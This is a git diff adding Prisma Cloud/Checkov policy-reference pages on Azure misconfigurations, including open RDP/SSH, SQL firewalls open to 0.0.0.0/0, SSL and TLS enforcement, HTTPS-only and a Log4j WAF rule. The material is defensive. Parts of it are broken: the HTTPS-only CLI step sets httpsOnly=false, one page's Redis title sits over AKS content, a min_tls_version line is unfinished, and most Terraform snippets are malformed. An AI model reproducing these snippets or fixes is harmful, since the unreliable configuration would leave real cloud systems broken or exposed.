+|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *connection_throttling* allows the PostgreSQL Database to set the verbosity of logged messages. +It generates query and error logs with respect to concurrent connections that could lead to a successful Denial of Service (DoS) attack by exhausting connection resources. +A system can also fail or be degraded by an overload of legitimate users. +Query and error logs can be used to identify, troubleshoot, repair configuration errors, and address sub-optimal performance issues. +We recommend you set *connection_throttling* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Azure Database* for * PostgreSQL server*. + +. For each database: a) Click * Server* parameters. ++ +b) Navigate to * connection_throttling*. ++ +c) Click * On*. ++ +d) Click * Save*. + + +* CLI Command* + + +To update the * connection_throttling configuration*, use the following command: +---- +az postgres server configuration set +--resource-group & lt;resourceGroupName> +--server-name & lt;serverName> +--name connection_throttling +--value on +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +{ + "- resource "azurerm_postgresql_configuration" "example" { +- name = "connection_throttling" +- resource_group_name = data.azurerm_resource_group.example.name +- server_name = azurerm_postgresql_server.example.name +- value = "off" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc new file mode 100644 index 000000000..2cfd8a251 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc @@ -0,0 +1,57 @@ +== Azure MariaDB database server with SSL connection disabled +// Azure MariaDB Database Server SSL connection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 57d0cd4e-e3ce-4ef2-83ec-97f6b5ac24b3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py[CKV_AZURE_47] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Azure Database for MariaDB supports connecting your Azure Database for MariaDB server to client applications using Secure Sockets Layer (SSL). +Enforcing SSL connections between your database server and your client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and your application. +This configuration enforces that SSL is always enabled for accessing your database server. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_server +* *Arguments:* ssl_enforcement_enabled + + +[source,go] +---- +{ + "resource "azurerm_mariadb_server" "example" { + ... ++ ssl_enforcement_enabled = true +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc new file mode 100644 index 000000000..5f6ef7fb8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc @@ -0,0 +1,125 @@ +== Azure RDP Internet access is not restricted +// Azure RDP internet access not restricted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c5b550a1-6a53-4033-a0a3-95fe4e45349e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py[CKV_AZURE_9] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Azure RDP Internet access is not restricted* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c5b550a1-6a53-4033-a0a3-95fe4e45349e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py [CKV_AZURE_9] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +A potential security problem using RDP over the Internet is that attackers can use various brute force techniques to gain access to Azure Virtual Machines. +Once the attackers gain access, they can use a virtual machine as a launch point for compromising other machines on the Azure Virtual Network. +The attackers could also access and attack networked devices outside of Azure. +We recommend you disable RDP access over the internet to Network Security Groups. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. For each VM, open the * Networking* blade. + +. Verify that the* INBOUND PORT RULES** does not have a rule for RDP. ++ +For example: ++ +* Port = 3389 ++ +* Protocol = TCP ++ +* Source = Any OR Internet + + +* CLI Command* + + +To list Network Security Groups with the corresponding non-default Security rules, use the following command: `az network nsg list --query [*].[name,securityRules]` +Ensure that the NSGs do not have any of the following security rules: +* "access" : "Allow" +* "destinationPortRange" : "3389" or "*" or "[port range containing 3389]" +* "direction" : "Inbound" +* "protocol" : "TCP" +* "sourceAddressPrefix" : "*" or "0.0.0.0" or "+++ +& lt;nw> ++++ +/0" or "/0" or "internet" or "any"+++ +& lt;/nw>+++ +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_rule +* *Arguments:* access + protocol + destination_port_range + source_address_prefix + + +[source,go] +---- +resource "azurerm_network_security_rule" "example" { + ... +- access = "Allow" +- protocol = "TCP" +- destination_port_range = ["3389" / ]] +- source_address_prefix = "*" / "0.0.0.0" / "/0" / "/0" / "internet" / "any" + ... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc new file mode 100644 index 000000000..dc23a6606 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc @@ -0,0 +1,122 @@ +== Azure Network Security Group allows all traffic on SSH (port 22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 062a3a24-122c-4335-8883-9991039e1776 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py[CKV_AZURE_10] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Azure Network Security Group allows all traffic on SSH (port 22)* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 062a3a24-122c-4335-8883-9991039e1776 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py [CKV_AZURE_10] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +A potential security problem using SSH over the Internet is that attackers can use various brute force techniques to gain access to Azure Virtual Machines. +Once the attackers gain access, they can use a virtual machine as a launch point for compromising other machines on the Azure Virtual Network. +The attackers could also access and attack networked devices outside of Azure. +We recommend you disable SSH access over the internet to Network Security Groups. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. For each VM, open the * Networking* blade. + +. Verify that the* INBOUND PORT RULES** does not have a rule for SSH. ++ +For example: ++ +* Port = 22 ++ +* Protocol = TCP ++ +* Source = Any OR Internet + + +* CLI Command* + + +To list Network Security Groups with corresponding non-default Security rules, use the following command: `az network nsg list --query [*].[name,securityRules]` +Ensure that the NSGs do not have any of the following security rules: +* "access" : "Allow" +* "destinationPortRange" : "22" or "*" or "[port range containing 22]" +* "direction" : "Inbound" +* "protocol" : "TCP" +* "sourceAddressPrefix" : "*" or "0.0.0.0" or "+++ +& lt;nw> ++++/0" or "/0" or "internet" or "any" ++++ +& lt;/nw>+++ +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_rule +* *Arguments:* access + protocol + destination_port_range + source_address_prefix + + +[source,go] +---- +resource "azurerm_network_security_rule" "example" { +- access = "Allow" +- protocol = "TCP" +- destination_port_range = ["22" / ]] +- source_address_prefix = "*" / "0.0.0.0" / "/0" / "/0" / "internet" / "any" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc new file mode 100644 index 000000000..765a9c792 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc @@ -0,0 +1,133 @@ +== Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0 +// Azure SQL Servers Firewall rule allow ingress access from IP address 0.0.0.0/0 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 427c5e57-07d6-4dc6-8142-848a2472e963 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 427c5e57-07d6-4dc6-8142-848a2472e963 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +SQL Server includes a firewall to block access to unauthorized connections. +More granular IP addresses can be defined by referencing the range of addresses available from specific datacenters. +The SQL server default Firewall exists with StartIp of 0.0.0.0 and EndIP of 0.0.0.0, allowing access to all Azure services. +A custom rule can be set with StartIp of 0.0.0.0 and EndIP of 255.255.255.255, allowing access from *any* IP over the Internet. +To reduce the potential attack surface for a SQL server, firewall rules should be defined with more granular IP addresses. +This is achieved by referencing the range of addresses available from specific datacenters. +We recommend SQL Databases do not allow ingress from 0.0.0.0/0, that is, any IP. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each SQL server: a) Click * Firewall / Virtual Networks*. ++ +b) Set * Allow access to Azure services* to * OFF*. ++ +c) Set firewall rules to limit access to authorized connections. + + +* CLI Command* + + +To disable default Firewall rule * Allow access to Azure services*, use the following commands: `Remove-AzureRmSqlServerFirewallRule -FirewallRuleName ` +---- +"AllowAllWindowsAzureIps" +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +---- +To remove a custom Firewall rule, use the following command: +---- +Remove-AzureRmSqlServerFirewallRule +-FirewallRuleName "& lt;firewallRuleName>" +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +---- +To set the appropriate firewall rules, use the following command: +---- +Set-AzureRmSqlServerFirewallRule +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-FirewallRuleName "& lt;Fw rule Name>" +-StartIpAddress "& lt;IP Address other than 0.0.0.0>" +-EndIpAddress "& lt;IP Address other than0.0.0.0 or 255.255.255.255>" +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_firewall_rule azurerm_sql_firewall_rule azurerm_postgresql_firewall_rule azurerm_mysql_firewall_rule +* *Arguments:* start_ip_address + + +[source,go] +---- +{ + "resource "azurerm_mysql_firewall_rule" "example" { + ... +- start_ip_address = "0.0.0.0" +- end_ip_address = "255.255.255.255" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc new file mode 100644 index 000000000..c0748741c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc @@ -0,0 +1,90 @@ +== Azure App Service Web app doesn't redirect HTTP to HTTPS +// Azure App Service Web app does not enforce HTTPS-only traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cc2b77b-ad71-4a84-8cab-66b2b04eea5f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py[CKV_AZURE_14] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Azure Web Apps by default allows sites to run under both HTTP and HTTPS, and can be accessed by anyone using non-secure HTTP links. +Non-secure HTTP requests can be restricted and all HTTP requests redirected to the secure HTTPS port. +We recommend you enforce HTTPS-only traffic to increase security. +This will redirect all non-secure HTTP requests to HTTPS ports. +HTTPS uses the SSL/TLS protocol to provide a secure connection, which is both encrypted and authenticated. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. For each App, click App. ++ +a) Navigate to the * Setting* section. ++ +b) Click * SSL settings*. ++ +c) Navigate to the * Protocol Settings* section. ++ +d) Set * HTTPS Only* to * On*. + + +* CLI Command* + + +To set HTTPS-only traffic for an existing app, use the following command: +---- +az webapp update +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +--set httpsOnly=false +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +*Resource*: azurerm_app_service *Argument*: https_only + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ https_only = true +}", + +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc new file mode 100644 index 000000000..376fbc941 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc @@ -0,0 +1,90 @@ +== Azure App Service Web app doesn't use latest TLS version +// Azure App Service Web app does not use latest TLS version + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 74e43b65-16bf-42a5-8d10-a0f245716cde + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py[CKV_AZURE_15] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data over the internet using standard encryption technology. +Encryption should be set with the latest version of TLS. +App service allows TLS 1.2 by default, which is the recommended TLS level by industry standards, for example, PCI DSS. +App service currently allows the web app to set TLS versions 1.0, 1.1 and 1.2. +For secure web app connections it is highly recommended to only use the latest TLS 1.2 version. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. For each Web App, click _App_. ++ +a) Navigate to *Setting **section. ++ +b) Click * SSL Settings*. ++ +c) Navigate to *Protocol Settings **section. ++ +d) Set * Minimum TLS Version* to * 1.2*. + + +* CLI Command* + + +To set TLS Version for an existing app, use the following command: +---- +az webapp config set +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +--min-tls-version 1.2 +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* min_tls_version + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... +- min_tls_version = + } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc new file mode 100644 index 000000000..0d8cb0544 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc @@ -0,0 +1,91 @@ +== Azure App Service Web app client certificate is disabled +// Azure App Service Web App client certificate disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1eec428-ad10-4206-a40e-916dbb0a76bd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AppServiceClientCertificate.py[CKV_AZURE_17] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Client certificates allow the Web App to require a certificate for incoming requests. +Only clients that have a valid certificate will be able to reach the app. +The TLS mutual authentication technique in enterprise environments ensures the authenticity of clients to the server. +If incoming client certificates are enabled only an authenticated client with valid certificates can access the app. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. For each Web App, click* App*. ++ +a) Navigate to *Setting **section. ++ +b) Click * SSL Settings*. ++ +c) Navigate to *Protocol Settings **section. ++ +d) Set * Incoming client certificates* to * On*. + + +* CLI Command* + + +To set Incoming client certificates value for an existing app, use the following command: +---- +az webapp update +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +--set clientCertEnabled=true +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* client_cert_enabled + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ client_cert_enabled = true +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc new file mode 100644 index 000000000..34876c85d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc @@ -0,0 +1,99 @@ +== Azure App Service Web app doesn't use HTTP 2.0 +// Azure App Service Web App does not use HTTP 2.0 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4f5c4a28-c3df-4bee-a980-621c794548ed + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py[CKV_AZURE_18] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Periodically, new versions of HTTP are released to address security flaws and include additional functionality. +HTTP 2.0 has additional performance improvements on the head-of-line blocking problem of the older HTTP version, header compression, and prioritization of requests. +HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own more efficient mechanisms for data streaming. +We recommend you use the latest HTTP version for web apps and take advantage of any security fixes and new functionalities featured. +With each software installation you can determine if a given update meets your organization's requirements. +Organizations should verify the compatibility and support provided for any additional software, assessing the current version against the update revision being considered. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. For each Web App, click* App*. ++ +a) Navigate to *Setting **section. ++ +b) Click * Application Settings*. ++ +c) Navigate to *General Settings **section. ++ +d) Set * HTTP version* to * 2.0*. ++ +NOTE: Most modern browsers support the HTTP 2.0 protocol over TLS only, with non-encrypted traffic using HTTP 1.1. To ensure that client browsers connect to your app with HTTP/2, either by an App Service Certificate for your app's custom domain or by binding a third party certificate. + + + +* CLI Command* + + +To set HTTP 2.0 version for an existing app, use the following command: +---- +az webapp config set +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +--http20-enabled true +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* http2_enabled + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... + ++ site_config { ++ http2_enabled = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc new file mode 100644 index 000000000..71c3c7d01 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc @@ -0,0 +1,87 @@ +== Azure MySQL Database Server SSL connection is disabled +// Azure MySQL Database Server SSL connection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cc96a6d0-3251-4bf9-aaa4-349c34810721 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py[CKV_AZURE_28] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +SSL connectivity provides a new layer of security by connecting a database server to client applications using Secure Sockets Layer (SSL). +Enforcing SSL connections between a database server and client applications helps protect against _man-in-the-middle_ attacks. +This is achieved by encrypting the data stream between the server and application. +We recommend you set *Enforce SSL connection* to *Enable* on MYSQL Server databases. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Azure Database* for * MySQL server*. + +. For each database: a) Click * Connection security*. ++ +b) Navigate to *SSL Settings **section. ++ +c) To * Enforce SSL connection* click * ENABLED*. + + +* CLI Command* + + +To set MYSQL Databases to Enforce SSL connection, use the following command: +---- +az mysql server update +--resource-group & lt;resourceGroupName> +--name & lt;serverName> +--ssl-enforcement Enabled +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* ssl_enforcement_enabled + + +[source,go] +---- +{ + "resource "azurerm_mysql_server" "example" { + ... + + ssl_enforcement_enabled = true +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc new file mode 100644 index 000000000..096b519cc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc @@ -0,0 +1,95 @@ +== Azure Storage Account 'Trusted Microsoft Services' access not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3d8d4e24-1336-4bc1-a1f3-15e680edca07 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py[CKV_AZURE_36] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Some Microsoft services that interact with storage accounts operate from networks that cannot be granted access through network rules. +To help this type of service work as intended, you can allow the set of trusted Microsoft services to bypass the network rules. +These services will use strong authentication to access the storage account. +Allowing trusted Microsoft services grants access to the storage account for the following services: Azure Backup, Azure Site Recovery, Azure DevTest Labs, Azure Event Grid, Azure Event Hubs, Azure Networking, Azure Monitor and Azure SQL Data Warehouse (when registered in the subscription). +Turning on firewall rules for a storage account will block access to incoming requests for data, including from other Azure services, such as using the portal and writing logs. +Functionality can be re-enabled. +The customer can get access to services like Monitor, Networking, Hubs, and Event Grid by enabling *Trusted Microsoft Services* through exceptions. +Backup and Restore of Virtual Machines using unmanaged disks in storage accounts with network rules applied is supported by creating an exception. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Storage Accounts*. + +. For each storage account: a) Navigate to * Settings* menu. ++ +b) Click * Firewalls and virtual networks*. ++ +c) For selected networks, select * Allow access*. ++ +d) Select * Allow trusted Microsoft services to access this storage account*. ++ +e) To apply changes,click * Save*. + + +* CLI Command* + + +To update trusted Microsoft services, use the following command: +---- +az storage account update +--name & lt;StorageAccountName> +--resource-group & lt;resourceGroupName> +--bypass AzureServices +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account azurerm_storage_account_network_rules +* *Arguments:* bypass + + +[source,go] +---- +{ + "resource "azurerm_storage_account" "example" { + ... ++ bypass = ["AzureServices"] + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..65202d2cc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,67 @@ +== Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled +// Azure Application Gateway Web Application Firewall (WAF) policy rule for Remote Command Execution disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0550cb51-be87-48c6-af1a-2bd1f91b8d91 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py[CKV_AZURE_135] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Using a vulnerable version of Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string which can potentially lead to a risky code execution, data leakage and more. +Set your Application Gateway (WAF) to prevent executing such mechanism using the rule definition below. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228] + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor_firewall_policy + + +[source,go] +---- +{ + "resource "azurerm_web_application_firewall_policy" "example" { + location = "germanywestcentral" + name = "example" + resource_group_name = "example" + + managed_rules { + managed_rule_set { + type = "OWASP" + version = "3.1" + } + + } + + policy_settings {} +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc new file mode 100644 index 000000000..0500ef970 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc @@ -0,0 +1,58 @@ +== Azure Container registries Public access to All networks is enabled +// Azure Container Registry public access to All networks enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d283949a-7a91-4cc6-883c-944013c38202 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py[CKV_AZURE_139] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access by disabling automated anonymous pulling improves security by ensuring your Azure ACRs. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_container_registry +* *Arguments:* anonymous_pull_enabled + + +[source,go] +---- +{ + "resource "azurerm_container_registry" "ckv_unittest_pass_1" { + name = "containerRegistry1" + resource_group_name = azurerm_resource_group.rg.name + location = azurerm_resource_group.rg.location + sku = "Premium" + anonymous_pull_enabled = false +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc new file mode 100644 index 000000000..ceab42a6b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc @@ -0,0 +1,71 @@ +== Azure Redis Cache does not use the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d4827453-7559-4044-96fe-786493016357 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access properly improves security by ensuring your Azure AKS cluster nodes can only be accessed from a non-public IP address. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* enable_node_public_ip (default is "false") + + +[source,go] +---- +{ + "resource "azurerm_kubernetes_cluster" "ckv_unittest_pass" { + name = "example-aks1" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + dns_prefix = "exampleaks1" + + default_node_pool { + name = "default" + node_count = 1 + vm_size = "Standard_D2_v2" + } + + + identity { + type = "SystemAssigned" + } + + + tags = { + Environment = "Production" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc new file mode 100644 index 000000000..606e0760d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc @@ -0,0 +1,77 @@ +== Azure App service slot does not have debugging disabled + + +=== 